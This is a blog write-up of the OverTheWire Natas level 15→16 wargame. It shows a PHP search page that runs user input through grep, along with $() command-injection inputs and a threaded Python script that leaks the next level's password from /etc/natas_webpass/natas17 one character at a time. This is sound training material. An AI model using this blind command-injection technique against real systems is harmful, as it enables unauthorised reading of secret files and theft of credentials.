<!DOCTYPE html>
<html>

  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <meta name="description" content="You can't see what I can see">

    <link rel="shortcut icon" href="/favicon.ico?" type="image/x-icon">
    <link rel="icon" href="/favicon.ico?" type="image/x-icon">
    <link rel="stylesheet" href="https://cdnjs.Cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
    <link rel="stylesheet" href="/assets/css/main.min.css ">
    <link rel="canonical" href="/2021/05/28/natas15-16/">
    <link rel="alternate" type="application/rss+xml" title="Caminek" href="/feed.xml ">
    
    <!-- Begin Jekyll SEO tag v2.7.1 -->
<title>Natas Level 15 → Level 16 | Caminek</title>
<meta name="generator" content="Jekyll v4.2.0" />
<meta property="og:title" content="Natas Level 15 → Level 16" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="You can’t see what I can see" />
<meta property="og:description" content="You can’t see what I can see" />
<link rel="canonical" href="/2021/05/28/natas15-16/" />
<meta property="og:url" content="/2021/05/28/natas15-16/" />
<meta property="og:site_name" content="Caminek" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-05-28T07:15:19-04:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Natas Level 15 → Level 16" />
<script type="application/ld+json">
{"@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"/2021/05/28/natas15-16/"},"description":"You can’t see what I can see","headline":"Natas Level 15 → Level 16","dateModified":"2021-05-28T07:15:19-04:00","url":"/2021/05/28/natas15-16/","datePublished":"2021-05-28T07:15:19-04:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->






</head>


  <body>

    <header id="top">
    <div class="wrapper">
        
            <img src="/assets/img/misc/avatar.png" alt="site.icon" width="32" height="32" style="vertical-align:middle"/>
        
        <a href="/" class="brand">Caminek</a>
        <small></small>
        <button id="headerMenu" class="menu"><i class="fa fa-bars"></i></button>
        <nav id="headerNav">
            <ul>
                <li>
                    
                    <a href="/">
                    
                        <i class="fa fa-home"></i>Home
                    </a>
                </li>

                
                    
                    <li>
                        
                        <a href="/series/">
                        
                            <i class="fa fa-book"></i>Series
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/archive/">
                        
                            <i class="fa fa-archive"></i>Archives
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/category/">
                        
                            <i class="fa fa-th-list"></i>Categories
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/tag/">
                        
                            <i class="fa fa-tags"></i>Tags
                        </a>
                    </li>
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
            </ul>
        </nav>
    </div>
</header>


        <div class="page clearfix" index>
    <div class="left">
        <h1>Natas Level 15 → Level 16</h1>
        <div class="label">

            <div class="label-card">
                <i class="fa fa-calendar"></i> 2021-05-28
            </div>

            <div class="label-card">
                
            </div>

            <div class="label-card">
                
            </div>

            <div class="label-card">
            


<!-- <span class="point">•</span> -->
<span class="categories">
  <i class="fa fa-th-list"></i>
  
    
        <a href="/category/#ctf" title="Category: ctf" rel="category">ctf</a>&nbsp;
    
        <a href="/category/#wargames" title="Category: wargames" rel="category">wargames</a>&nbsp;
    
        <a href="/category/#web-security" title="Category: web-security" rel="category">web-security</a>
    
  

  <!-- <span class="point">•</span> -->
</span>


            </div>

            <div class="label-card">
            
<!-- <span class="point">•</span> -->
<span class="pageTag">
  <i class="fa fa-tags"></i>
  
    
        <!--a href="/tag/#wargames" title="Tag: wargames" rel="tag">wargames</a-->
        <a href="/tag/#wargames" title="Tag: wargames" rel="tag">wargames</a>&nbsp;
    
        <!--a href="/tag/#ctf" title="Tag: ctf" rel="tag">ctf</a-->
        <a href="/tag/#ctf" title="Tag: ctf" rel="tag">ctf</a>&nbsp;
    
        <!--a href="/tag/#overthewire" title="Tag: overthewire" rel="tag">overthewire</a-->
        <a href="/tag/#overthewire" title="Tag: overthewire" rel="tag">overthewire</a>&nbsp;
    
        <!--a href="/tag/#web-security" title="Tag: web-security" rel="tag">web-security</a-->
        <a href="/tag/#web-security" title="Tag: web-security" rel="tag">web-security</a>
    
  

</span>

            </div>

        </div>
        <hr>
        <article itemscope itemtype="http://schema.org/BlogPosting">
            <h2 id="level-goal">Level Goal</h2>
<p>Excluding the URL and username, the Level Goal section is blank for the Natas ctf.</p>

<h2 id="solution">Solution</h2>
<p>The natas16 site is an updated version of the natas9 site. This time the key is placed in quotes, and with the filters in place, we cannot reuse our solution.</p>

<p>Here’s the code for the site:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;pre&gt;</span>
<span class="cp">&lt;?</span>
<span class="nv">$key</span> <span class="o">=</span> <span class="s2">""</span><span class="p">;</span>

<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"needle"</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$key</span> <span class="o">=</span> <span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"needle"</span><span class="p">];</span>
<span class="p">}</span>

<span class="k">if</span><span class="p">(</span><span class="nv">$key</span> <span class="o">!=</span> <span class="s2">""</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">preg_match</span><span class="p">(</span><span class="s1">'/[;|&amp;`\'"]/'</span><span class="p">,</span><span class="nv">$key</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">print</span> <span class="s2">"Input contains an illegal character!"</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="nb">passthru</span><span class="p">(</span><span class="s2">"grep -i </span><span class="se">\"</span><span class="nv">$key</span><span class="se">\"</span><span class="s2"> dictionary.txt"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>
<span class="nt">&lt;/pre&gt;</span>
</code></pre></div></div>

<p>While the filter makes our task more difficult, it does not make it impossible due to one oversight, the command substitution notation <strong>$()</strong> was not included. We can combine this with the way this application behaves to create a binary attack to leak the password. This is similar to the method used in the previous level, except sqlmap won’t be able to help; We’ll need to script this.</p>

<p>Note that if we search for something in the database, every match comes back. If nothing is found, nothing is returned. We can create a similar attack to the last level by finding a word that returns a single result. For this, I will use the word <strong>sonatas</strong>. I happened to find this word looking for natas in the dictionary. Any word will work so long as only one result is returned.</p>

<p>If we use the word sonatas immediately followed by a carefully created command substitution, we can leak the password for the next level.  Enter the following into the form:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sonatas$(grep a /etc/natas_webpass/natas17)
</code></pre></div></div>

<p>Notice that we got the word sonatas back.  Now try searching for the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sonatas$(grep 8 /etc/natas_webpass/natas17)
</code></pre></div></div>

<p>The returned result is blank. This is because the natas17 password contains an “8”. The matching line is now appended to the end of the word sonatas.  In other words, if the password was <strong>*789xyz</strong>, our first search was unaffected since there no “a”, but in the second search the “8” was matched and sonatas became sonatas789xyz. Since the command substitution takes place, this is the word the application looked for.  Since sonatas789xyz is not in the dictionary, nothing was returned.</p>

<p>With this, we can modify the scripts from the last level for this task. If you haven’t read the write-up for the previous level and are not familiar with how the binary attack works, I’d recommend doing so.</p>

<p>Like the previous level, you’ll need to supply the current level password to the script.</p>

<p>Script Performance:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Filtering characters completed in 2.24 seconds
Password search completed in 34.62 seconds

Completed in 36.86 seconds
</code></pre></div></div>

<p>Here’s the script:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python
</span><span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">from</span> <span class="nn">requests.auth</span> <span class="kn">import</span> <span class="n">HTTPBasicAuth</span>
<span class="kn">import</span> <span class="nn">concurrent.futures</span>

<span class="n">start_script</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="n">all_chars</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">string</span><span class="p">.</span><span class="n">ascii_uppercase</span> <span class="o">+</span> <span class="n">string</span><span class="p">.</span><span class="n">ascii_lowercase</span> <span class="o">+</span> <span class="n">string</span><span class="p">.</span><span class="n">digits</span><span class="p">)</span>
<span class="n">natas16_password</span> <span class="o">=</span> <span class="s">"W------------------------------h"</span>  <span class="c1"># Password for the current level
</span><span class="n">natas17_password</span> <span class="o">=</span> <span class="s">""</span>  <span class="c1"># Buffer for the next level password
</span><span class="n">filtered_chars</span> <span class="o">=</span> <span class="s">""</span>


<span class="k">def</span> <span class="nf">get_chars</span><span class="p">(</span><span class="n">char</span><span class="p">):</span>
    <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'http://natas16.natas.labs.overthewire.org/index.php?needle=sonatas$(grep '</span> <span class="o">+</span>
                       <span class="n">char</span> <span class="o">+</span> <span class="s">' /etc/natas_webpass/natas17)'</span><span class="p">,</span> <span class="n">auth</span><span class="o">=</span><span class="n">HTTPBasicAuth</span><span class="p">(</span><span class="s">'natas16'</span><span class="p">,</span> <span class="n">natas16_password</span><span class="p">))</span>

    <span class="k">if</span> <span class="s">'sonatas'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">req</span><span class="p">.</span><span class="n">text</span><span class="p">:</span>
        <span class="k">return</span> <span class="n">char</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">None</span>


<span class="n">start_filter</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">with</span> <span class="n">concurrent</span><span class="p">.</span><span class="n">futures</span><span class="p">.</span><span class="n">ThreadPoolExecutor</span><span class="p">()</span> <span class="k">as</span> <span class="n">executor</span><span class="p">:</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">executor</span><span class="p">.</span><span class="nb">map</span><span class="p">(</span><span class="n">get_chars</span><span class="p">,</span> <span class="n">all_chars</span><span class="p">)</span>

    <span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">result</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">r</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
            <span class="n">filtered_chars</span> <span class="o">=</span> <span class="n">filtered_chars</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">r</span><span class="p">)</span>

<span class="n">end_filter</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="se">\n</span><span class="s">Filtering characters completed in </span><span class="si">{</span><span class="nb">round</span><span class="p">(</span><span class="n">end_filter</span> <span class="o">-</span> <span class="n">start_filter</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span><span class="si">}</span><span class="s"> seconds'</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">get_password</span><span class="p">(</span><span class="n">fc</span><span class="p">):</span>
    <span class="n">req</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'http://natas16.natas.labs.overthewire.org/index.php?needle=sonatas$(grep ^'</span> <span class="o">+</span> <span class="n">natas17_password</span> <span class="o">+</span>
                       <span class="nb">str</span><span class="p">(</span><span class="n">fc</span><span class="p">)</span> <span class="o">+</span> <span class="s">' /etc/natas_webpass/natas17)'</span><span class="p">,</span> <span class="n">auth</span><span class="o">=</span><span class="n">HTTPBasicAuth</span><span class="p">(</span><span class="s">'natas16'</span><span class="p">,</span> <span class="n">natas16_password</span><span class="p">))</span>

    <span class="k">if</span> <span class="s">'sonatas'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">req</span><span class="p">.</span><span class="n">text</span><span class="p">:</span>
        <span class="k">return</span> <span class="nb">str</span><span class="p">(</span><span class="n">fc</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">None</span>


<span class="n">start_password</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">32</span><span class="p">):</span>
    <span class="k">with</span> <span class="n">concurrent</span><span class="p">.</span><span class="n">futures</span><span class="p">.</span><span class="n">ThreadPoolExecutor</span><span class="p">()</span> <span class="k">as</span> <span class="n">executor</span><span class="p">:</span>
        <span class="n">result</span> <span class="o">=</span> <span class="n">executor</span><span class="p">.</span><span class="nb">map</span><span class="p">(</span><span class="n">get_password</span><span class="p">,</span> <span class="n">filtered_chars</span><span class="p">)</span>

        <span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">result</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">r</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
                <span class="n">natas17_password</span> <span class="o">=</span> <span class="n">natas17_password</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">r</span><span class="p">)</span>
                <span class="k">print</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>

<span class="n">end_password</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="se">\n</span><span class="s">Password search completed in </span><span class="si">{</span><span class="nb">round</span><span class="p">(</span><span class="n">end_password</span> <span class="o">-</span> <span class="n">start_password</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span><span class="si">}</span><span class="s"> seconds'</span><span class="p">)</span>

<span class="n">end_script</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">perf_counter</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="se">\n</span><span class="s">Completed in </span><span class="si">{</span><span class="nb">round</span><span class="p">(</span><span class="n">end_script</span> <span class="o">-</span> <span class="n">start_script</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span><span class="si">}</span><span class="s"> seconds'</span><span class="p">)</span>
</code></pre></div></div>


        </article>
        <hr>
        

        <div class="post-recent">
    <div class="pre" style="display:inline-block; margin-top: 20px;">
        
        <p><i class="fa fa-arrow-left"></i> <a href="/2021/05/27/natas14-15/">Natas Level 14 → Level 15</a></p>
        
    </div>
    <div class="nex" style="display:inline-block; margin-top: 20px; float:right;">
        
        <p><a href="/2021/05/28/natas16-17/">Natas Level 16 → Level 17</a> <i class="fa fa-arrow-right"></i></p>
        
    </div>
</div>

        
        
        

    </div>
    <button class="anchor"><i class="fa fa-anchor"></i></button>
    <div class="right">
        <div class="wrap">
            <div class="side">
                <div>
                    <i class="fa fa-pencil-square-o" aria-hidden="true"></i>
                    Recent Posts
                </div>
                <ul class="content-ul" recent>
                    
                        <li><a href="/2021/05/31/natas26-27/">Natas Level 26 → Level 27</a></li>
                    
                        <li><a href="/2021/05/31/natas25-26/">Natas Level 25 → Level 26</a></li>
                    
                        <li><a href="/2021/05/30/natas24-25/">Natas Level 24 → Level 25</a></li>
                    
                        <li><a href="/2021/05/30/natas23-24/">Natas Level 23 → Level 24</a></li>
                    
                        <li><a href="/2021/05/30/natas22-23/">Natas Level 22 → Level 23</a></li>
                    
                </ul>
            </div>

            <!-- Content -->
            <div class="side ">
                <div>
                    <i class="fa fa-th-list"></i>
                    Categories
                </div>
                <ul class="content-ul" cate>
                    
                    <li>
                        <a href="/category/#reverse-engineering" class="categories-list-item" cate="reverse-engineering">
                            <span class="name">
                                reverse-engineering
                            </span>
                            <span class="badge">13</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#x86-64" class="categories-list-item" cate="x86-64">
                            <span class="name">
                                x86-64
                            </span>
                            <span class="badge">8</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#ctf" class="categories-list-item" cate="ctf">
                            <span class="name">
                                ctf
                            </span>
                            <span class="badge">68</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#wargames" class="categories-list-item" cate="wargames">
                            <span class="name">
                                wargames
                            </span>
                            <span class="badge">63</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#linux" class="categories-list-item" cate="linux">
                            <span class="name">
                                linux
                            </span>
                            <span class="badge">35</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#web-security" class="categories-list-item" cate="web-security">
                            <span class="name">
                                web-security
                            </span>
                            <span class="badge">28</span>
                        </a>
                    </li>
                    
                </ul>
            </div>

            <!-- Tag Cloud -->
            
        </div>
    </div>
</div>
<script>
/**
 * target _blank
 */
(function() {
    var aTags = document.querySelectorAll('article a:not([id])')
    for (var i = 0; i < aTags.length; i++) {
        aTags[i].setAttribute('target', '_blank')
    }
}());
</script>
<!-- <script src="/assets/js/pageContent.js " charset="utf-8"></script> -->


    <footer class="site-footer">


    <div class="wrapper">

        <p class="description">
            
        </p>
        <p class="contact">
            Find me on: 
            <a href="https://github.com/caminek" title="GitHub"><i class="fa fa-github" aria-hidden="true"></i></a> 
             
        </p>
        <p class="power">
            <span>
                Site powered by <a href="https://jekyllrb.com/">Jekyll</a> & <a href="https://pages.github.com/">Github Pages</a>.
            </span>
            <span>
                Theme designed by <a href="https://github.com/Gaohaoyang">HyG</a>, and modified by <a href="https://github.com/caminek">caminek</a>.
            </span>
        </p>
    </div>
</footer>

    <div class="back-to-top">
    <a href="#top" data-scroll>
        <i class="fa fa-arrow-up" aria-hidden="true"></i>
    </a>
</div>

    <!-- <script src=" /assets/js/main.js " charset="utf-8"></script>
    <script src=" /assets/js/smooth-scroll.min.js " charset="utf-8"></script> -->
    <script src=" /assets/js/all.js " charset="utf-8"></script>
    <script type="text/javascript">
      smoothScroll.init({
        speed: 500, // Integer. How fast to complete the scroll in milliseconds
        easing: 'easeInOutCubic', // Easing pattern to use
        offset: 20, // Integer. How far to offset the scrolling anchor location in pixels
      });
    </script>
    <!-- <script src=" /assets/js/scroll.min.js " charset="utf-8"></script> -->
  </body>

</html>
